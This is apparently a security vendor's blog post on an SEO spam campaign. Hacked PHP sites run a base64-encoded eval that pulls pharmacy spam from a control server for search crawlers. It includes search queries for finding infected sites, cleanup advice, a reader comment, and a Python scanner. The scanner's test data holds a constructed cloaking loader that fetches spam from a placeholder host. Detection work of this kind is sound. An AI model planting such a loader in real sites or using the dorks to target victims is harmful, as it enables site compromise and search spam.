More spam: Google-traffic-analytics.com C&C server

We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is that all of them are controlled by just one site: http://www.google-traffic-analytics.com.

And when this site went down, guess what is showing up on Google:


Yes, that’s around 202k different pages that have been hacked and are showing those results. When Google-traffic-analytics.com was up, instead of that error the hacked pages would spill SPAM to search engines (5 mg tadalafil, viagra, etc.).

Just some of the affected sites:


Finding them on Google is pretty simple as well: inurl:.org "5mg tadalafil", or you can also search for: "http://www.google-traffic-analytics.com" "Warning: file_get_contents", which is what shows up when you try to access a hacked site while the google-traffic-analytics site is offline.

As far as cleaning up an affected site, it looks like the attackers added a base64-encoded eval inside the index.php file to load http://www.google-traffic-analytics.com and present the SPAM if the request came from a search engine. Cleaning that up should be enough to remove the spam/error itself, but you still have to find the root cause that allowed your site to get hacked.
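One way to check a site's PHP files for the kind of injection described above, as an added example that is not code from the original post: it finds eval(base64_decode(...)) calls, decodes the argument, and reports any remote fetch, the hosts named in it, and signs of search-engine cloaking. The function name scan_php, the cloaking markers, the sample files and the host spam-host.example are assumptions constructed for illustration; the real payload is not shown in the post.

```python
import base64
import re

# eval(base64_decode('...')) with either quote style and optional whitespace.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE)
FETCH = re.compile(r"\b(file_get_contents|curl_exec|fsockopen)\s*\(", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Assumed markers of search-engine cloaking; the post does not show the real check.
CLOAK = re.compile(r"HTTP_USER_AGENT|HTTP_REFERER|googlebot|bingbot", re.I)


def scan_php(source):
    """Return one finding per eval(base64_decode(...)) call in PHP source."""
    findings = []
    for m in EVAL_B64.finditer(source):
        try:
            blob = re.sub(r"\s+", "", m.group(2))
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            decoded = ""  # not valid base64; still report the eval itself
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "remote_fetch": bool(FETCH.search(decoded)),
            "hosts": sorted(set(h.lower() for h in URL_HOST.findall(decoded))),
            "cloaked": bool(CLOAK.search(decoded)),
            "decoded": decoded,
        })
    return findings


# Constructed sample, not the real payload: a loader that fetches spam from a
# placeholder host only when the visitor looks like a search-engine crawler.
_PAYLOAD = (
    "if (preg_match('/googlebot|bingbot/i', $_SERVER['HTTP_USER_AGENT'])) {"
    " echo file_get_contents('http://spam-host.example/links.php'); }"
)
INFECTED_INDEX = (
    "<?php\n"
    "eval(base64_decode('%s'));\n"
    "require 'app.php';\n" % base64.b64encode(_PAYLOAD.encode()).decode()
)
CLEAN_INDEX = "<?php\n$logo = base64_decode($cfg['logo']);\nrequire 'app.php';\n"

if __name__ == "__main__":
    for name, src in (("infected", INFECTED_INDEX), ("clean", CLEAN_INDEX)):
        for f in scan_php(src):
            print(name, "line", f["line"], f["hosts"], "cloaked" if f["cloaked"] else "")
```

A finding only locates the injected line; files dropped elsewhere on the site and the original entry point still have to be tracked down separately.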

We will post more details when we have them.


About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • marc

    Thanks for this post! I’m working on the brooklynwaldorf.org website and I just deleted several PHP files from the root directory (c.php, l.php, cart.php, etc.) and a load of files in our img directory. Wondering if there is anything else to do but wait and see if our search results recover?

    I’m not sure that I understand the connection to google-traffic-analytics.com – do you think there are any specific fixes to do here? So far, I’ve only deleted files and changed the FTP password…